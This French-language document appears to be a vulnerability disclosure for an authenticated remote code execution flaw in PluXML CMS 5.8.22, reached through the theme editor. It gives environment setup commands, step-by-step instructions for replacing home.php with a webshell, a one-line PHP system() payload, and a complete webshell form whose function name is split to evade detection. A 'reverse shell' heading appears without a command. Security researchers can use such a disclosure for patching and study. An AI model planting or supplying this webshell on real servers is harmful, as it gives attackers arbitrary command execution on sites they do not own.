
Une vulnérabilité critique d’exécution de code à distance (RCE) a été identifiée dans PluXML CMS version 5.8.22. Cette vulnérabilité permet à des administrateurs authentifiés d’exécuter du code PHP arbitraire sur le serveur web en téléversant des webshells PHP malveillants via la fonctionnalité de l’éditeur de thème.
git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
Exploitation étape par étape
Authentification : connectez-vous au panneau d'administration de PluXML avec des identifiants administrateur valides Accédez à l'éditeur de thème :
Accédez au tableau de bord d'administration
Accédez à : Thèmes → Home.php → Modifier

Injectez une charge utile malveillante :
Remplacez le contenu existant de home.php par un webshell PHP
Exemple de payload : <?php system($_GET['cmd']); ?>
Enregistrez le fichier modifié
Déclenchez l'exécution :
Visitez la page d'accueil principale du site Le code PHP injecté s'exécute avec les privilèges du serveur web
Shell inversé
Payload de la webshell
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input
type="TEXT"
name="cmd"
autofocus
id="cmd"
size="80"
>
<input
type="SUBMIT"
value="Execute"
>
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
$func_name = "sys" . "tem";
$func_name($_GET['cmd']);
}
?>
</pre>
</body>
</html>